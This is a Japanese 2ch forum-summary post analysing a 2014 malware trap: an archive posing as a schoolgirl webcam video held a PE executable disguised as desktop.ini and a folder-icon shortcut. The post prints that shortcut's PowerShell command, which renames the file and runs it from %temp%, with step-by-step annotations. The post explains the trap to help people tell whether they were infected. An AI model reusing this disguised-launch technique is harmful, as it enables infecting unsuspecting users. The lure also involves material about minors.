【2ch】ニュー速クオリティ:【速報】情強( )の嫌儲板でロリコン達が一斉ウイルス感染する事態にwwwwwww
(情報元のブックマーク数
PowerShellを使ったマルウエアって感じかな。当局が動き出すとやばいかもね。
526 :番組の途中ですがアフィサイトへの転載は禁止です [sage] :2014/04/30(水) 23:43:07.25 id:hLXFnYX90
追加あり >>287まとめ中身
desktop.ini: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit, UPX compressed
mov.lnk: MS Windows shortcut
thumbs.db: Macromedia Flash Videomov.lnkの内容というかプロパティ↓
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe md 'mov' ;del 'mov.lnk' ;saps mov ;mv thumbs.db mov\mov.flv;sp mov\mov.flv attributes Archive;mv 'desktop.ini' '%temp%\x.exe';saps '%temp%\x.exe';トラップのシナリオ
・解凍したらファイルが3つでてくる。
・そのうち「mov」と名前が付いてる、「フォルダのアイコン」をしたショートカットがトリガー
・こいつをダブルクリックとか「開く」とかやると
・desktop.ini を、c:\temp\x.exe という名前にリネーム移動
・そいつを実行アウトとセーフ
・解凍しただけならセーフ
・というか、mov ショートカットに触ってなければ問題ない
・ダブルクリックとか「開く」とかしたらアウト、シングルクリックは多分大丈夫
・XPならそもそも↓こんなものは存在しないのでセーフ。vista/7/8は知らん
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exethumbs.db
http://news4vip.livedoor.biz/archives/52019048.html
JCかJSのウェブカメラムービー。ニコ生かなんか?パンツも乳首もない、まあ普通の映像
上記より
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe md 'mov' ;del 'mov.lnk' ;saps mov ;mv thumbs.db mov\mov.flv;sp mov\mov.flv attributes Archive;mv 'desktop.ini' '%temp%\x.exe';saps '%temp%\x.exe';
とりあえず、x.exeが起動するみたいだ。
# movディレクトリ作成
New-Item -Path 'mov' -ItemType directory;# mov.lnkを削除
Remove-Item 'mov.lnk';# Start Process で mov folderをExplorerで開く
Start-Process mov;# thumbs.dbを、mov\mov.flvに移動
Move-Item thumbs.db mov\mov.flv# mov\mov.flvをアーカイブ属性にする(不明)
Set-ItemProperty mov\mov.flv attributes Archive# desktop.iniを %temp%\x.exeに移動
Move-Item 'desktop.ini' '%temp%\x.exe'# Start Process で %temp%\x.exe を起動
Start-Process saps '%temp%\x.exe';
